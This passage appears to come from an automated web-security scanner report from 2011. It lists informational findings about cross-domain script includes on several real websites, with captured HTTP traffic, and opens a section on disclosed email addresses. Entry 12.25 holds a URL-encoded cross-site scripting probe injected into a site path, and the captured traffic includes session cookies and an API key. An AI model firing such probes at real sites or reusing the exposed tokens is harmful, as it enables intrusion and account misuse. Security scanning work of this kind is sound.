x-amz-id-2: 1Ss6mZtSFBOr+ddLUpdq/3jVqTjjBulz3PNOFkOOsW3JglEdTWsOrhGN98B24yo6
x-amz-request-id: 16FACE70BEA024DA
Date: Mon, 12 Sep 2011 12:48:42 GMT
x-amz-meta-cb-modifiedtime: Thu, 14 Jul 2011 20:45:32 GMT
Last-Modified: Thu, 14 Jul 2011 20:56:00 GMT
ETag: "f1779351a10904cc817b410a56ec86c3"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 9585
Server: AmazonS3

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>NDN Top Picks Widge
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-573scDfDoUH6o&callback=qcCallback"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
12.17. http://www.digitaldollhouse.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
</script>
<script src="http://static.woopra.com/js/woopra.v2.js" type="text/javascript"></script>
...[SNIP]...
<!-- Begin: 4q.iperceptions.com --><script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=db35e419-4469-64f48812-f81a-4e4c-930c-5aa18d636b5f&lID=1&loc=4Q-WEB2" type="text/javascript" defer="defer" ></script>
...[SNIP]...
12.18. http://www.dome9.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dome9.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.dome9.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.dome9.com/xmlrpc.php
X-Powered-By: ASP.NET
Date: Mon, 12 Sep 2011 12:40:45 GMT
Content-Length: 16467

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Dome9 ... Secure your Cloud | VPS, Dedicated, Cloud and EC2 Security</title>
<link rel="stylesheet" type="tex
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.js?ver=1.4'></script>
...[SNIP]...
</script><script charset="utf-8" type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
12.19. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.182.118
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:09 GMT
Content-Length: 13284

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/QcD8XaevqyL.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/jMxYWoMkQmY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/zqPZ0y028IT.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/s9CzvuREOy5.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
12.20. http://www.fastcompany.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
<!-- START REDARIL-->
<SCRIPT type="text/javascript" language="JavaScript" src="http://p0.raasnet.com/partners/dfp.js"></SCRIPT>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
12.21. http://www.mtv.co.uk/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.2.6
Vary: User-Agent
Vary: Accept-Encoding
Vary: User-Agent
Debug: lnioxp008wuk
ETag: "a01be5fcfc2aae272af84e020237ac98"
Pragma: no-cache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Date: Mon, 12 Sep 2011 12:49:38 GMT
Content-Length: 89363
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
<!-- /script -->
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mtvuk"></script>
...[SNIP]...
<div class="content"><script src="http://widgets3.flux.com/Loader" type="text/javascript" id="0BFCFFFF000916CC0002FFFFFC0B"></script>
...[SNIP]...
<!-- CODA -->
<script type="text/javascript" src="http://intl.esperanto.mtvi.com/sitewide/scripts/widgets/geo/geoload.jhtml?load=persistent&profile=mtv_co_uk_persistent" id="MTVNI-GEO-JS"></script>
<script type="text/javascript" src="http://intl.esperanto.mtvi.com/sitewide/scripts/widgets/geo/geoload.jhtml?load=advisory&profile=mtv_co_uk" id="MTVNI-GEO-JS"></script>

<script type="text/JavaScript" src="http://btg.mtvnservices.com/aria/coda.html?site=mtv.co.uk"></script>
...[SNIP]...
</p>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</a>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://f21.360tag.com/MTV/Tg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js">
{lang: 'en-GB'}
</script>
...[SNIP]...
12.22. http://www.nowpublic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nowpublic.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.nowpublic.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:18 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n54.panthercdn.com
ETag: "f79c8d21f3918aedd34f5c0ed9e4fcae"
Cache-Control: max-age=360
Expires: Mon, 12 Sep 2011 12:54:12 GMT
Age: 6
Content-Length: 74898
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Last-Modified: Mon, 12 Sep 2011 12:28:25 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<div class="wrapper-body">
<script type="text/javascript" src="http://www.examiner.com/sites/all/modules/custom/pajito/widget/content/widget.js.php?partner=nowpublic#width=300" id="examiner-pajita"></script>
...[SNIP]...
<!-- BEGIN STANDARD TAG - popunder only - ROS: Run-of-site - DO NOT MODIFY -->
<script type="text/javascript" src="http://adserving.cpxadroit.com/tags3/nowpublic_cpop.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!--Audience Science Page Tag ... Examiner --><script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=G07610&amp;bpid=S0277"></script>
...[SNIP]...
</script>
<script src="http://c5.zedo.com/jsc/c5/fo.js"></script>
...[SNIP]...
</script>
<script src="http://c5.zedo.com/jsc/c5/fo.js"></script>
...[SNIP]...
12.23. http://www.observer.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.observer.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.observer.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:06 GMT
Server: VoxCAST
Set-Cookie: visitor_page_count=1.5; expires=Mon, 12-Sep-2011 12:45:39 GMT; path=/
X-Powered-By: PHP/5.2.6-1+lenny10
X-Head-Server: Linux web7.observermediagroup.com 2.6.26-1-amd64 #1 SMP Sat Jan 10 17:57:00 UTC 2009 x86_64
X-Pingback: http://www.observer.com/xmlrpc.php
X-Cache: HIT from VoxCAST
Age: 148
Content-Length: 63799
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML>
<html dir="ltr" lang="en-US">
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<!--[if lt IE 9]>
<script src="http://html5shim.google
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Place this tag in your head or just before your close body tag -->
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...
12.24. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /modules/facebook_connect/xd_receiver.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /modules/facebook_connect/xd_receiver.php HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=8f072b21dbdc4e39c5d76aad0538c9d6&extern=0&channel=http%3A%2F%2Fwww.onsugar.com%2Fmodules%2Ffacebook_connect%2Fxd_receiver.php&locale=en_US
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1; __utma=191106292.423945842.1315850649.1315850649.1315850649.1; __utmb=191106292.2.10.1315850649; __utmc=191106292; __utmz=191106292.1315850649.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1847238086-1315850649395

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web013-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Cache-Control: max-age=225065900
Expires:
Pragma:
Vary:
Vary: Accept-Encoding
Content-type: text/html
Date: Mon, 12 Sep 2011 13:03:52 GMT
Server: lighttpd/1.4.26
Content-Length: 636


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
XD) receiver page. It needs to be placed on your domain so that the Javascript
library can communicate within the iframe permission model. Put it here:

http://www.example.com/xd_receiver.php
-->

<script src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.js' type='text/javascript'></script>
...[SNIP]...
12.25. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web014-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832630%7C5CKyG59MaJD7bSL%2BWHYWGqeAyMWC71WkfTqG%2FgrlKsXzqjYH8JcN%2BVHCKe1sQLdwNRmlR66qd%2BN6nGNdxVd%2BTEYtwVmgVvDNddwciSAOcL%2FsjPvmppJcUaHyoyNVEQt4%2F2BBcC6BoZQb9K%2F6t979ZN1XHdoJkpX2z8GxZjTEJ6rnzryCKtBnna0nrKS08GlTS6M0J3weSHeuZzKDMs35tw%3D%3D%7C1a48544dabced6305ba059d446818611fec5a1dc; expires=Wed, 05-Oct-2011 16:37:10 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:03:50 GMT
Server: lighttpd/1.4.26
Content-Length: 7845

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.statcounter.com/counter/counter_xhtml.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
12.26. http://www.popsci.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popsci.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.popsci.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: web4f D=18707
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Language: en
cache-control: max-age = 300
Content-Length: 116217
Date: Mon, 12 Sep 2011 12:48:09 GMT
X-Varnish: 1570744016 1570730120
Via: 1.1 varnish
Connection: keep-alive
age: 0
X-Cache: webcache11: HIT 87

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div id="job-listing-block">
<script type="text/javascript" src="http://edge.jobthread.com/jobs.popsci.com/feeds/jobroll/?num_jobs=3&num_featured_jobs=0&display_method=default&template_name=popsci1&version=2.0"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- END Nielsen Online SiteCensus V6.0 --><script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...
12.27. http://www.popsugar.com/community/welcome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /community/welcome

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/welcome HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web016-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 65851
Date: Mon, 12 Sep 2011 12:47:53 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831673%7CVtj50HZwVAf6XzfIzt45pAblVAlc658GleP1Nc35FHk5BZz8pEix8Xg9Ase9%2BJLn7b%2F9pIbiJ0AODiCY4BZ%2BnHUcb3CfiqQFmj9iC2QEl%2FzrN4OjXbIVbnYL7TtT%2FNDOa20QiTZ69ZIOPH8NHKmxFb%2FNBZJzlZW52yg3LBuLhLbFzZXUJa5yM5PtJvnVaNds%2FFv5HCzpMbHW3EMGGJZjog%3D%3D%7C111c881ae8b070d6503319a594ad0a72df3828a0; expires=Wed, 05-Oct-2011 16:21:13 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<head>
<script type="text/javascript" src="http://media29.onsugar.com/v645/static/js/onsugar.js"></script>
<script src="http://media21.onsugar.com/v0/static/js/sso.js" type="text/javascript"></script>
...[SNIP]...
<link rel="canonical" href="http://www.popsugar.com/community/welcome">
<script src="http://media8.onsugar.com/v645/static/js/1.6.1.0/prototype.js" type="text/javascript"></script>
<script type="text/javascript" src=http://media35.onsugar.com/v645/static/js/clickTracker.js></script>
<script type="text/javascript" src="http://media3.onsugar.com/v645/static/js/prototype-ui/lib/effects.js"></script>
<script type="text/javascript" src="http://media3.onsugar.com/v645/static/js/prototype-ui/dist/carousel.js"></script>
<script src="http://media22.onsugar.com/v645/static/js/livepipe/livepipe.js" type="text/javascript"></script>
<script src="http://media31.onsugar.com/v645/static/js/livepipe/window.js" type="text/javascript"></script>

<script type="text/javascript" src="http://media28.onsugar.com/v645/static/js/drupal.js"></script>
<script type="text/javascript" src="http://media26.onsugar.com/v645/static/js/autocomplete.js"></script>
<script type="text/javascript" src="http://media20.onsugar.com/v645/themes/onsugar_themes/sugar2010/js/sugar.js"></script>
<script type="text/javascript" src="http://media29.onsugar.com/v645/themes/onsugar_themes/sugar/js/float.js"></script>
<script type="text/javascript" src="http://media7.onsugar.com/v645/themes/onsugar_themes/sugar2010/js/sugar-ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://bit.ly/javascript-api.js?version=2.0.1&amp;login=freshguide&amp;apiKey=R_b2b4fc2ea3cb442b96cb24de917e3b35"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://media3.onsugar.com/v645/static/js/fbconnect.js" type="text/javascript"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>
...[SNIP]...
</script>
<script src="http://widgets.getglue.com/checkin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.statcounter.com/counter/counter_xhtml.js"></script>
...[SNIP]...
12.28. http://www.symantec.com/connect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /connect/ HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:28:52 +0000
Vary: Cookie
ETag: "1315830532"
Content-Type: text/html; charset=utf-8
X-Varnish: 1371254795 1371243899
X-Varnish-Cache: HIT
X-Varnish-Hits: 220
Vary: Accept-Encoding
Content-Length: 80288
Cache-Control: public, max-age=2472
Date: Mon, 12 Sep 2011 12:48:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<![endif]--> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
13. Email addresses disclosed  previous  next
There are 20 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

13.1. http://drupal.org/node/101494  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drupal.org
Path:   /node/101494

Issue detail

The following email address was disclosed in the response:

Request

GET /node/101494 HTTP/1.1
Host: drupal.org
Proxy-Connection: keep-alive
Referer: http://drupal.org/security-team
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
